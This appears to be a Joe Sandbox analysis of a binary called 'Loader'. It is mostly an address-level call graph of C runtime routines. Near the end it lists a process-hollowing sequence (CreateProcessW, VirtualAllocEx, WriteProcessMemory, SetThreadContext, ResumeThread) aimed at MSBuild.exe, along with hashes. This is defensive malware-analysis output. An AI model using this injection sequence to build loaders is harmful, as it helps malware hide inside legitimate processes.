9944->9945 9946 e64828 9944->9946 9955 e5f4d0 9945->9955 9967 e5f170 9946->9967 9951 e5f980 std::_Throw_Cpp_error 51 API calls 9952 e647ae CatchIt 9951->9952 9954 e647fa CatchIt 9952->9954 9961 e5d7f0 9952->9961 9954->9943 9957 e5f718 9955->9957 9956 e5f2e0 std::_Throw_Cpp_error 5 API calls 9956->9957 9957->9956 9958 e5f94d 9957->9958 9959 e64241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9958->9959 9960 e5f960 9959->9960 9960->9951 9963 e5d8d2 9961->9963 9962 e5e5ad std::_Throw_Cpp_error 9964 e64241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9962->9964 9963->9962 9966 e5e600 std::_Throw_Cpp_error 48 API calls 9963->9966 9965 e5e5d5 9964->9965 9965->9954 9966->9963 9968 e64846 std::_Xinvalid_argument 50 API calls 9967->9968 9969 e5f182 9968->9969 9971 e5d7f0 std::_Throw_Cpp_error 48 API calls 9970->9971 9972 e5d7ab 9971->9972 9972->9889 9974 e64114 9973->9974 9975 e64241 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 9974->9975 9976 e64196 9975->9976 9976->9672 9978 e6499a 9977->9978 9979 e64968 GetExitCodeThread 9977->9979 9978->9610 9979->9978 9980 e64979 CloseHandle 9979->9980 9980->9610 9983 e68477 ___scrt_is_nonwritable_in_current_image 9982->9983 9984 e6a00a _unexpected 48 API calls 9983->9984 9985 e6847c 9984->9985 9986 e6835d __FrameHandler3::FrameUnwindToState 48 API calls 9985->9986 9987 e684a6 9986->9987 9989 e6705f 9988->9989 9990 e6704d 9988->9990 10006 e671ba 9989->10006 9991 e653ec __FrameHandler3::FrameUnwindToState GetModuleHandleW 9990->9991 9993 e67052 9991->9993 9993->9989 10000 e66f54 GetModuleHandleExW 9993->10000 9995 e66f0c 9995->8782 10001 e66fb4 10000->10001 10002 e66f93 GetProcAddress 10000->10002 10004 e66fc3 10001->10004 10005 e66fba FreeLibrary 10001->10005 10002->10001 10003 e66fa7 10002->10003 10003->10001 10004->9989 10005->10004 10007 e671c6 ___scrt_is_nonwritable_in_current_image 10006->10007 10021 e68161 EnterCriticalSection 10007->10021 10009 e671d0 10022 e670b7 10009->10022 10011 e671dd 10026 e671fb 10011->10026 10014 e66fef 10051 e66fd6 10014->10051 10016 e66ff9 10017 e6700d 10016->10017 10018 e66ffd GetCurrentProcess TerminateProcess 10016->10018 10019 e66f54 __FrameHandler3::FrameUnwindToState 3 API calls 10017->10019 10018->10017 10020 e67015 ExitProcess 10019->10020 10021->10009 10024 e670c3 ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState 10022->10024 10023 e67127 __FrameHandler3::FrameUnwindToState 10023->10011 10024->10023 10029 e6776b 10024->10029 10050 e68178 LeaveCriticalSection 10026->10050 10028 e67096 10028->9995 10028->10014 10030 e67777 __EH_prolog3 10029->10030 10033 e679f6 10030->10033 10032 e6779e __FrameHandler3::FrameUnwindToState 10032->10023 10034 e67a02 ___scrt_is_nonwritable_in_current_image 10033->10034 10041 e68161 EnterCriticalSection 10034->10041 10036 e67a10 10042 e678c1 10036->10042 10041->10036 10043 e678d8 10042->10043 10044 e678e0 10042->10044 10046 e67a45 10043->10046 10044->10043 10045 e6b0cb __freea 14 API calls 10044->10045 10045->10043 10049 e68178 LeaveCriticalSection 10046->10049 10048 e67a2e 10048->10032 10049->10048 10050->10028 10054 e6b94f 10051->10054 10053 e66fdb __FrameHandler3::FrameUnwindToState 10053->10016 10055 e6b95e __FrameHandler3::FrameUnwindToState 10054->10055 10056 e6b96b 10055->10056 10058 e69d53 10055->10058 10056->10053 10059 e69e9e __dosmaperr 5 API calls 10058->10059 10060 e69d6f 10059->10060 10060->10056 10062 e66a8f ___scrt_uninitialize_crt 10061->10062 10063 e66a7d 10061->10063 10062->8824 10064 e66a8b 10063->10064 10066 e6b4a7 10063->10066 10064->8824 10069 e6b5d2 10066->10069 10072 e6b6ab 10069->10072 10073 e6b6b7 ___scrt_is_nonwritable_in_current_image 10072->10073 10080 e68161 EnterCriticalSection 10073->10080 10075 e6b72d 10089 e6b74b 10075->10089 10076 e6b6c1 ___scrt_uninitialize_crt 10076->10075 10081 e6b61f 10076->10081 10080->10076 10082 e6b62b ___scrt_is_nonwritable_in_current_image 10081->10082 10092 e66aef EnterCriticalSection 10082->10092 10084 e6b66e 10106 e6b69f 10084->10106 10085 e6b635 ___scrt_uninitialize_crt 10085->10084 10093 e6b4b0 10085->10093 10205 e68178 LeaveCriticalSection 10089->10205 10091 e6b4ae 10091->10064 10092->10085 10094 e6b4c5 __strnicoll 10093->10094 10095 e6b4d7 10094->10095 10096 e6b4cc 10094->10096 10109 e6b515 10095->10109 10097 e6b5d2 ___scrt_uninitialize_crt 77 API calls 10096->10097 10099 e6b4d2 10097->10099 10101 e67fd7 __strnicoll 48 API calls 10099->10101 10103 e6b50f 10101->10103 10103->10084 10104 e6b4f8 10122 e6e11f 10104->10122 10204 e66b03 LeaveCriticalSection 10106->10204 10108 e6b68d 10108->10076 10110 e6b52e 10109->10110 10114 e6b4e1 10109->10114 10111 e6d936 ___scrt_uninitialize_crt 48 API calls 10110->10111 10110->10114 10112 e6b54a 10111->10112 10133 e6e45a 10112->10133 10114->10099 10115 e6d936 10114->10115 10116 e6d957 10115->10116 10117 e6d942 10115->10117 10116->10104 10118 e6b757 __strnicoll 14 API calls 10117->10118 10119 e6d947 10118->10119 10120 e67d69 __strnicoll 48 API calls 10119->10120 10121 e6d952 10120->10121 10121->10104 10123 e6e130 10122->10123 10126 e6e13d 10122->10126 10124 e6b757 __strnicoll 14 API calls 10123->10124 10128 e6e135 10124->10128 10125 e6e186 10127 e6b757 __strnicoll 14 API calls 10125->10127 10126->10125 10129 e6e164 10126->10129 10130 e6e18b 10127->10130 10128->10099 10174 e6e19c 10129->10174 10132 e67d69 __strnicoll 48 API calls 10130->10132 10132->10128 10134 e6e466 ___scrt_is_nonwritable_in_current_image 10133->10134 10135 e6e46e 10134->10135 10136 e6e4a7 10134->10136 10138 e6e4ed 10134->10138 10135->10114 10137 e67f12 __strnicoll 29 API calls 10136->10137 10137->10135 10144 e6d8d7 EnterCriticalSection 10138->10144 10140 e6e4f3 10141 e6e511 10140->10141 10145 e6e23e 10140->10145 10171 e6e563 10141->10171 10144->10140 10146 e6e266 10145->10146 10168 e6e289 ___scrt_uninitialize_crt 10145->10168 10147 e6e26a 10146->10147 10149 e6e2c5 10146->10149 10148 e67f12 __strnicoll 29 API calls 10147->10148 10148->10168 10150 e6e2e3 10149->10150 10151 e6fa51 ___scrt_uninitialize_crt 50 API calls 10149->10151 10152 e6e56b ___scrt_uninitialize_crt 49 API calls 10150->10152 10151->10150 10153 e6e2f5 10152->10153 10154 e6e342 10153->10154 10155 e6e2fb 10153->10155 10156 e6e356 10154->10156 10157 e6e3ab WriteFile 10154->10157 10158 e6e303 10155->10158 10159 e6e32a 10155->10159 10162 e6e397 10156->10162 10163 e6e35e 10156->10163 10160 e6e3cd GetLastError 10157->10160 10157->10168 10164 e6e9af ___scrt_uninitialize_crt 6 API calls 10158->10164 10158->10168 10161 e6e5e8 ___scrt_uninitialize_crt 54 API calls 10159->10161 10160->10168 10161->10168 10165 e6ea17 ___scrt_uninitialize_crt 7 API calls 10162->10165 10166 e6e383 10163->10166 10167 e6e363 10163->10167 10164->10168 10165->10168 10169 e6ebdb ___scrt_uninitialize_crt 8 API calls 10166->10169 10167->10168 10170 e6eaf2 ___scrt_uninitialize_crt 7 API calls 10167->10170 10168->10141 10169->10168 10170->10168 10172 e6d8fa ___scrt_uninitialize_crt LeaveCriticalSection 10171->10172 10173 e6e569 10172->10173 10173->10135 10175 e6e1a8 ___scrt_is_nonwritable_in_current_image 10174->10175 10187 e6d8d7 EnterCriticalSection 10175->10187 10177 e6e1b7 10185 e6e1fc 10177->10185 10188 e6d68e 10177->10188 10178 e6b757 __strnicoll 14 API calls 10181 e6e203 10178->10181 10180 e6e1e3 FlushFileBuffers 10180->10181 10182 e6e1ef GetLastError 10180->10182 10201 e6e232 10181->10201 10183 e6b76a __dosmaperr 14 API calls 10182->10183 10183->10185 10185->10178 10187->10177 10189 e6d6b0 10188->10189 10190 e6d69b 10188->10190 10192 e6b76a __dosmaperr 14 API calls 10189->10192 10194 e6d6d5 10189->10194 10191 e6b76a __dosmaperr 14 API calls 10190->10191 10193 e6d6a0 10191->10193 10195 e6d6e0 10192->10195 10196 e6b757 __strnicoll 14 API calls 10193->10196 10194->10180 10197 e6b757 __strnicoll 14 API calls 10195->10197 10198 e6d6a8 10196->10198 10199 e6d6e8 10197->10199 10198->10180 10200 e67d69 __strnicoll 48 API calls 10199->10200 10200->10198 10202 e6d8fa ___scrt_uninitialize_crt LeaveCriticalSection 10201->10202 10203 e6e21b 10202->10203 10203->10128 10204->10108 10205->10091 10206 e5be70 10207 e5be9b 10206->10207 10208 e66ed5 21 API calls 10207->10208 10209 e5beaf 10208->10209 10331 e6a5f0 10332 e6a5fc ___scrt_is_nonwritable_in_current_image 10331->10332 10343 e68161 EnterCriticalSection 10332->10343 10334 e6a603 10344 e6d839 10334->10344 10337 e6a621 10363 e6a647 10337->10363 10342 e6a732 2 API calls 10342->10337 10343->10334 10345 e6d845 ___scrt_is_nonwritable_in_current_image 10344->10345 10346 e6d84e 10345->10346 10347 e6d86f 10345->10347 10348 e6b757 __strnicoll 14 API calls 10346->10348 10366 e68161 EnterCriticalSection 10347->10366 10350 e6d853 10348->10350 10351 e67d69 __strnicoll 48 API calls 10350->10351 10352 e6a612 10351->10352 10352->10337 10357 e6a67c GetStartupInfoW 10352->10357 10353 e6d8a7 10374 e6d8ce 10353->10374 10355 e6d87b 10355->10353 10367 e6d789 10355->10367 10358 e6a61c 10357->10358 10359 e6a699 10357->10359 10358->10342 10359->10358 10360 e6d839 49 API calls 10359->10360 10361 e6a6c1 10360->10361 10361->10358 10362 e6a6f1 GetFileType 10361->10362 10362->10361 10378 e68178 LeaveCriticalSection 10363->10378 10365 e6a632 10366->10355 10368 e6b807 __dosmaperr 14 API calls 10367->10368 10370 e6d79b 10368->10370 10369 e6d7a8 10371 e6b0cb __freea 14 API calls 10369->10371 10370->10369 10373 e69c11 6 API calls 10370->10373 10372 e6d7fd 10371->10372 10372->10355 10373->10370 10377 e68178 LeaveCriticalSection 10374->10377 10376 e6d8d5 10376->10352 10377->10376 10378->10365 10404 e66bf0 10405 e6b4a7 ___scrt_uninitialize_crt 77 API calls 10404->10405 10406 e66bf8 10405->10406 10414 e6b864 10406->10414 10408 e66bfd 10424 e6b90f 10408->10424 10411 e66c27 10412 e6b0cb __freea 14 API calls 10411->10412 10413 e66c32 10412->10413 10415 e6b870 ___scrt_is_nonwritable_in_current_image 10414->10415 10428 e68161 EnterCriticalSection 10415->10428 10417 e6b8e7 10435 e6b906 10417->10435 10418 e6b87b 10418->10417 10420 e6b8bb DeleteCriticalSection 10418->10420 10429 e6ed63 10418->10429 10423 e6b0cb __freea 14 API calls 10420->10423 10423->10418 10425 e6b926 10424->10425 10426 e66c0c DeleteCriticalSection 10424->10426 10425->10426 10427 e6b0cb __freea 14 API calls 10425->10427 10426->10408 10426->10411 10427->10426 10428->10418 10430 e6ed76 __strnicoll 10429->10430 10438 e6ee21 10430->10438 10432 e6ed82 10433 e67fd7 __strnicoll 48 API calls 10432->10433 10434 e6ed8e 10433->10434 10434->10418 10510 e68178 LeaveCriticalSection 10435->10510 10437 e6b8f3 10437->10408 10439 e6ee2d ___scrt_is_nonwritable_in_current_image 10438->10439 10440 e6ee37 10439->10440 10441 e6ee5a 10439->10441 10442 e67f12 __strnicoll 29 API calls 10440->10442 10448 e6ee52 10441->10448 10449 e66aef EnterCriticalSection 10441->10449 10442->10448 10444 e6ee78 10450 e6ed93 10444->10450 10446 e6ee85 10464 e6eeb0 10446->10464 10448->10432 10449->10444 10451 e6edc3 10450->10451 10452 e6eda0 10450->10452 10454 e6edbb 10451->10454 10455 e6b515 ___scrt_uninitialize_crt 73 API calls 10451->10455 10453 e67f12 __strnicoll 29 API calls 10452->10453 10453->10454 10454->10446 10456 e6eddb 10455->10456 10457 e6b90f 14 API calls 10456->10457 10458 e6ede3 10457->10458 10459 e6d936 ___scrt_uninitialize_crt 48 API calls 10458->10459 10460 e6edef 10459->10460 10467 e7001b 10460->10467 10463 e6b0cb __freea 14 API calls 10463->10454 10509 e66b03 LeaveCriticalSection 10464->10509 10466 e6eeb6 10466->10448 10468 e70044 10467->10468 10473 e6edf6 10467->10473 10469 e70093 10468->10469 10471 e7006b 10468->10471 10470 e67f12 __strnicoll 29 API calls 10469->10470 10470->10473 10474 e700be 10471->10474 10473->10454 10473->10463 10475 e700ca ___scrt_is_nonwritable_in_current_image 10474->10475 10482 e6d8d7 EnterCriticalSection 10475->10482 10477 e700d8 10479 e70109 10477->10479 10483 e6ff7b 10477->10483 10496 e70143 10479->10496 10482->10477 10484 e6d68e ___scrt_uninitialize_crt 48 API calls 10483->10484 10485 e6ff8b 10484->10485 10486 e6ff91 10485->10486 10488 e6ffc3 10485->10488 10489 e6d68e ___scrt_uninitialize_crt 48 API calls 10485->10489 10499 e6d6f8 10486->10499 10488->10486 10490 e6d68e ___scrt_uninitialize_crt 48 API calls 10488->10490 10491 e6ffba 10489->10491 10492 e6ffcf CloseHandle 10490->10492 10494 e6d68e ___scrt_uninitialize_crt 48 API calls 10491->10494 10492->10486 10493 e6ffdb GetLastError 10492->10493 10493->10486 10494->10488 10495 e6ffe9 ___scrt_uninitialize_crt 10495->10479 10508 e6d8fa LeaveCriticalSection 10496->10508 10498 e7012c 10498->10473 10500 e6d707 10499->10500 10501 e6d76e 10499->10501 10500->10501 10507 e6d731 10500->10507 10502 e6b757 __strnicoll 14 API calls 10501->10502 10503 e6d773 10502->10503 10504 e6b76a __dosmaperr 14 API calls 10503->10504 10505 e6d75e 10504->10505 10505->10495 10506 e6d758 SetStdHandle 10506->10505 10507->10505 10507->10506 10508->10498 10509->10466 10510->10437 8526 e6bc45 8527 e6bc83 8526->8527 8532 e6bc53 __dosmaperr 8526->8532 8536 e6b757 8527->8536 8529 e6bc6e RtlAllocateHeap 8530 e6bc81 8529->8530 8529->8532 8532->8527 8532->8529 8533 e67207 8532->8533 8539 e67242 8533->8539 8550 e6a15b GetLastError 8536->8550 8538 e6b75c 8538->8530 8540 e6724e ___scrt_is_nonwritable_in_current_image 8539->8540 8545 e68161 EnterCriticalSection 8540->8545 8542 e67259 __FrameHandler3::FrameUnwindToState 8546 e67290 8542->8546 8545->8542 8549 e68178 LeaveCriticalSection 8546->8549 8548 e67212 8548->8532 8549->8548 8551 e6a171 8550->8551 8552 e6a177 8550->8552 8573 e69b90 8551->8573 8556 e6a17b SetLastError 8552->8556 8578 e69bcf 8552->8578 8556->8538 8560 e6a1b0 8563 e69bcf __dosmaperr 6 API calls 8560->8563 8561 e6a1c1 8562 e69bcf __dosmaperr 6 API calls 8561->8562 8565 e6a1cd 8562->8565 8564 e6a1be 8563->8564 8592 e6b0cb 8564->8592 8566 e6a1d1 8565->8566 8567 e6a1e8 8565->8567 8568 e69bcf __dosmaperr 6 API calls 8566->8568 8598 e6a31c 8567->8598 8568->8564 8572 e6b0cb __freea 12 API calls 8572->8556 8603 e69e9e 8573->8603 8576 e69bc7 TlsGetValue 8577 e69bb5 8577->8552 8579 e69e9e __dosmaperr 5 API calls 8578->8579 8580 e69beb 8579->8580 8581 e69c09 TlsSetValue 8580->8581 8582 e69bf4 8580->8582 8582->8556 8583 e6b807 8582->8583 8584 e6b814 8583->8584 8585 e6b854 8584->8585 8586 e6b83f HeapAlloc 8584->8586 8587 e6b828 __dosmaperr 8584->8587 8589 e6b757 __strnicoll 13 API calls 8585->8589 8586->8587 8588 e6b852 8586->8588 8587->8585 8587->8586 8591 e67207 __dosmaperr 2 API calls 8587->8591 8590 e6a1a8 8588->8590 8589->8590 8590->8560 8590->8561 8591->8587 8593 e6b0d6 RtlFreeHeap 8592->8593 8594 e6b100 8592->8594 8593->8594 8595 e6b0eb GetLastError 8593->8595 8594->8556 8596 e6b0f8 __dosmaperr 8595->8596 8597 e6b757 __strnicoll 12 API calls 8596->8597 8597->8594 8618 e6a482 8598->8618 8604 e69ece 8603->8604 8605 e69bac 8603->8605 8604->8605 8610 e69dd3 8604->8610 8605->8576 8605->8577 8608 e69ee8 GetProcAddress 8608->8605 8609 e69ef8 __dosmaperr 8608->8609 8609->8605 8616 e69de4 ___vcrt_FlsFree 8610->8616 8611 e69e7a 8611->8605 8611->8608 8612 e69e02 LoadLibraryExW 8613 e69e81 8612->8613 8614 e69e1d GetLastError 8612->8614 8613->8611 8615 e69e93 FreeLibrary 8613->8615 8614->8616 8615->8611 8616->8611 8616->8612 8617 e69e50 LoadLibraryExW 8616->8617 8617->8613 8617->8616 8619 e6a48e ___scrt_is_nonwritable_in_current_image 8618->8619 8632 e68161 EnterCriticalSection 8619->8632 8621 e6a498 8633 e6a4c8 8621->8633 8624 e6a4d4 8625 e6a4e0 ___scrt_is_nonwritable_in_current_image 8624->8625 8637 e68161 EnterCriticalSection 8625->8637 8627 e6a4ea 8638 e6a2d1 8627->8638 8629 e6a502 8642 e6a522 8629->8642 8632->8621 8636 e68178 LeaveCriticalSection 8633->8636 8635 e6a38a 8635->8624 8636->8635 8637->8627 8639 e6a307 __dosmaperr 8638->8639 8640 e6a2e0 __dosmaperr 8638->8640 8639->8629 8640->8639 8645 e6bfae 8640->8645 8759 e68178 LeaveCriticalSection 8642->8759 8644 e6a1f3 8644->8572 8646 e6bfc4 8645->8646 8648 e6c02e 8645->8648 8646->8648 8650 e6bff7 8646->8650 8655 e6b0cb __freea 14 API calls 8646->8655 8649 e6b0cb __freea 14 API calls 8648->8649 8672 e6c07c 8648->8672 8651 e6c050 8649->8651 8652 e6c019 8650->8652 8660 e6b0cb __freea 14 API calls 8650->8660 8653 e6b0cb __freea 14 API calls 8651->8653 8654 e6b0cb __freea 14 API calls 8652->8654 8656 e6c063 8653->8656 8657 e6c023 8654->8657 8659 e6bfec 8655->8659 8661 e6b0cb __freea 14 API calls 8656->8661 8662 e6b0cb __freea 14 API calls 8657->8662 8658 e6c0ea 8663 e6b0cb __freea 14 API calls 8658->8663 8673 e6b9d5 8659->8673 8666 e6c00e 8660->8666 8667 e6c071 8661->8667 8662->8648 8668 e6c0f0 8663->8668 8665 e6b0cb 14 API calls __freea 8669 e6c08a 8665->8669 8701 e6bad3 8666->8701 8671 e6b0cb __freea 14 API calls 8667->8671 8668->8639 8669->8658 8669->8665 8671->8672 8713 e6c148 8672->8713 8674 e6b9e6 8673->8674 8700 e6bacf 8673->8700 8675 e6b9f7 8674->8675 8676 e6b0cb __freea 14 API calls 8674->8676 8677 e6ba09 8675->8677 8678 e6b0cb __freea 14 API calls 8675->8678 8676->8675 8679 e6ba1b 8677->8679 8680 e6b0cb __freea 14 API calls 8677->8680 8678->8677 8681 e6ba2d 8679->8681 8682 e6b0cb __freea 14 API calls 8679->8682 8680->8679 8683 e6b0cb __freea 14 API calls 8681->8683 8685 e6ba3f 8681->8685 8682->8681 8683->8685 8684 e6ba51 8687 e6ba63 8684->8687 8688 e6b0cb __freea 14 API calls 8684->8688 8685->8684 8686 e6b0cb __freea 14 API calls 8685->8686 8686->8684 8689 e6ba75 8687->8689 8690 e6b0cb __freea 14 API calls 8687->8690 8688->8687 8691 e6ba87 8689->8691 8692 e6b0cb __freea 14 API calls 8689->8692 8690->8689 8693 e6ba99 8691->8693 8694 e6b0cb __freea 14 API calls 8691->8694 8692->8691 8695 e6baab 8693->8695 8696 e6b0cb __freea 14 API calls 8693->8696 8694->8693 8697 e6babd 8695->8697 8698 e6b0cb __freea 14 API calls 8695->8698 8696->8695 8699 e6b0cb __freea 14 API calls 8697->8699 8697->8700 8698->8697 8699->8700 8700->8650 8702 e6bae0 8701->8702 8712 e6bb38 8701->8712 8703 e6baf0 8702->8703 8704 e6b0cb __freea 14 API calls 8702->8704 8705 e6bb02 8703->8705 8706 e6b0cb __freea 14 API calls 8703->8706 8704->8703 8707 e6b0cb __freea 14 API calls 8705->8707 8709 e6bb14 8705->8709 8706->8705 8707->8709 8708 e6bb26 8711 e6b0cb __freea 14 API calls 8708->8711 8708->8712 8709->8708 8710 e6b0cb __freea 14 API calls 8709->8710 8710->8708 8711->8712 8712->8652 8714 e6c155 8713->8714 8718 e6c174 8713->8718 8714->8718 8719 e6bb3c 8714->8719 8717 e6b0cb __freea 14 API calls 8717->8718 8718->8669 8720 e6bc1a 8719->8720 8721 e6bb4d 8719->8721 8720->8717 8755 e6bc20 8721->8755 8724 e6bc20 __dosmaperr 14 API calls 8725 e6bb60 8724->8725 8726 e6bc20 __dosmaperr 14 API calls 8725->8726 8727 e6bb6b 8726->8727 8728 e6bc20 __dosmaperr 14 API calls 8727->8728 8729 e6bb76 8728->8729 8730 e6bc20 __dosmaperr 14 API calls 8729->8730 8731 e6bb84 8730->8731 8732 e6b0cb __freea 14 API calls 8731->8732 8733 e6bb8f 8732->8733 8734 e6b0cb __freea 14 API calls 8733->8734 8735 e6bb9a 8734->8735 8736 e6b0cb __freea 14 API calls 8735->8736 8737 e6bba5 8736->8737 8738 e6bc20 __dosmaperr 14 API calls 8737->8738 8739 e6bbb3 8738->8739 8740 e6bc20 __dosmaperr 14 API calls 8739->8740 8741 e6bbc1 8740->8741 8742 e6bc20 __dosmaperr 14 API calls 8741->8742 8743 e6bbd2 8742->8743 8744 e6bc20 __dosmaperr 14 API calls 8743->8744 8745 e6bbe0 8744->8745 8746 e6bc20 __dosmaperr 14 API calls 8745->8746 8747 e6bbee 8746->8747 8748 e6b0cb __freea 14 API calls 8747->8748 8749 e6bbf9 8748->8749 8750 e6b0cb __freea 14 API calls 8749->8750 8751 e6bc04 8750->8751 8752 e6b0cb __freea 14 API calls 8751->8752 8753 e6bc0f 8752->8753 8754 e6b0cb __freea 14 API calls 8753->8754 8754->8720 8756 e6bc32 8755->8756 8757 e6bb55 8756->8757 8758 e6b0cb __freea 14 API calls 8756->8758 8757->8724 8758->8756 8759->8644 10696 e6aca2 10699 e68178 LeaveCriticalSection 10696->10699 10698 e6aca9 10699->10698 10210 e683ac 10211 e6b0cb __freea 14 API calls 10210->10211 10212 e683c4 10211->10212 10730 e641b0 10735 e64c32 10730->10735 10736 e64c42 10735->10736 10737 e641ba 10735->10737 10736->10737 10742 e651bb InitializeCriticalSectionEx 10736->10742 10739 e64f6a 10737->10739 10743 e64f7f 10739->10743 10742->10736 10744 e64f95 10743->10744 10745 e64f8e 10743->10745 10752 e67738 10744->10752 10749 e677a9 10745->10749 10748 e641c4 10750 e67738 51 API calls 10749->10750 10751 e677bb 10750->10751 10751->10748 10755 e6799b 10752->10755 10756 e679a7 ___scrt_is_nonwritable_in_current_image 10755->10756 10763 e68161 EnterCriticalSection 10756->10763 10758 e679b5 10764 e677bf 10758->10764 10760 e679c2 10774 e679ea 10760->10774 10763->10758 10765 e677da 10764->10765 10773 e6784d __dosmaperr 10764->10773 10766 e6d0c4 51 API calls 10765->10766 10772 e6782d 10765->10772 10765->10773 10768 e67823 10766->10768 10767 e6d0c4 51 API calls 10769 e67843 10767->10769 10770 e6b0cb __freea 14 API calls 10768->10770 10771 e6b0cb __freea 14 API calls 10769->10771 10770->10772 10771->10773 10772->10767 10772->10773 10773->10760 10777 e68178 LeaveCriticalSection 10774->10777 10776 e67769 10776->10748 10777->10776 10778 e6a2b0 10779 e6a2cb 10778->10779 10780 e6a2bb 10778->10780 10784 e6a3b5 10780->10784 10783 e6b0cb __freea 14 API calls 10783->10779 10785 e6a3d0 10784->10785 10786 e6a3ca 10784->10786 10788 e6b0cb __freea 14 API calls 10785->10788 10787 e6b0cb __freea 14 API calls 10786->10787 10787->10785 10789 e6a3dc 10788->10789 10790 e6b0cb __freea 14 API calls 10789->10790 10791 e6a3e7 10790->10791 10792 e6b0cb __freea 14 API calls 10791->10792 10793 e6a3f2 10792->10793 10794 e6b0cb __freea 14 API calls 10793->10794 10795 e6a3fd 10794->10795 10796 e6b0cb __freea 14 API calls 10795->10796 10797 e6a408 10796->10797 10798 e6b0cb __freea 14 API calls 10797->10798 10799 e6a413 10798->10799 10800 e6b0cb __freea 14 API calls 10799->10800 10801 e6a41e 10800->10801 10802 e6b0cb __freea 14 API calls 10801->10802 10803 e6a429 10802->10803 10804 e6b0cb __freea 14 API calls 10803->10804 10805 e6a437 10804->10805 10810 e6a52e 10805->10810 10811 e6a53a ___scrt_is_nonwritable_in_current_image 10810->10811 10826 e68161 EnterCriticalSection 10811->10826 10813 e6a544 10814 e6a56e 10813->10814 10817 e6b0cb __freea 14 API calls 10813->10817 10827 e6a58d 10814->10827 10817->10814 10818 e6a599 10819 e6a5a5 ___scrt_is_nonwritable_in_current_image 10818->10819 10831 e68161 EnterCriticalSection 10819->10831 10821 e6a5af 10822 e6a2d1 __dosmaperr 14 API calls 10821->10822 10823 e6a5c2 10822->10823 10832 e6a5e2 10823->10832 10826->10813 10830 e68178 LeaveCriticalSection 10827->10830 10829 e6a45d 10829->10818 10830->10829 10831->10821 10835 e68178 LeaveCriticalSection 10832->10835 10834 e6a2c3 10834->10783 10835->10834 10213 e7b18d 10214 e7b1c3 10213->10214 10215 e7b310 GetPEB 10214->10215 10216 e7b322 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 10214->10216 10215->10216 10216->10214 10217 e7b3c9 WriteProcessMemory 10216->10217 10218 e7b40e 10217->10218 10219 e7b413 WriteProcessMemory 10218->10219 10220 e7b450 WriteProcessMemory Wow64SetThreadContext ResumeThread 10218->10220 10219->10218 11292 e67310 11295 e67337 11292->11295 11296 e67343 ___scrt_is_nonwritable_in_current_image 11295->11296 11303 e68161 EnterCriticalSection 11296->11303 11298 e6734d 11299 e6737b 11298->11299 11301 e6c1fa __strnicoll 14 API calls 11298->11301 11304 e67399 11299->11304 11301->11298 11303->11298 11307 e68178 LeaveCriticalSection 11304->11307 11306 e67335 11307->11306

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00E7B0FF,00E7B0EF), ref: 00E7B323
                                                                                              • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00E7B336
                                                                                              • Wow64GetThreadContext.KERNEL32(0000009C,00000000), ref: 00E7B354
                                                                                              • ReadProcessMemory.KERNELBASE(00000098,?,00E7B143,00000004,00000000), ref: 00E7B378
                                                                                              • VirtualAllocEx.KERNELBASE(00000098,?,?,00003000,00000040), ref: 00E7B3A3
                                                                                              • WriteProcessMemory.KERNELBASE(00000098,00000000,?,?,00000000,?), ref: 00E7B3FB
                                                                                              • WriteProcessMemory.KERNELBASE(00000098,00400000,?,?,00000000,?,00000028), ref: 00E7B446
                                                                                              • WriteProcessMemory.KERNELBASE(00000098,?,?,00000004,00000000), ref: 00E7B484
                                                                                              • Wow64SetThreadContext.KERNEL32(0000009C,00D60000), ref: 00E7B4C0
                                                                                              • ResumeThread.KERNELBASE(0000009C), ref: 00E7B4CF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682306038.0000000000E7B000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682287388.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682321853.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682336982.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1682354030.0000000000E81000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e50000_Loader.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                              • API String ID: 2687962208-3857624555
                                                                                              • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                              • Instruction ID: 2422d89882512a0f46ad05bb97b40a26682dc0ed2c52e85f889642d1ea3e6776
                                                                                              • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                              • Instruction Fuzzy Hash: 10B1087660168AAFDB60CF68CC80BDA73A5FF88714F158524EA0CAB341D770FA51CB94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1682266067.0000000000E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E50000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1682251980.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
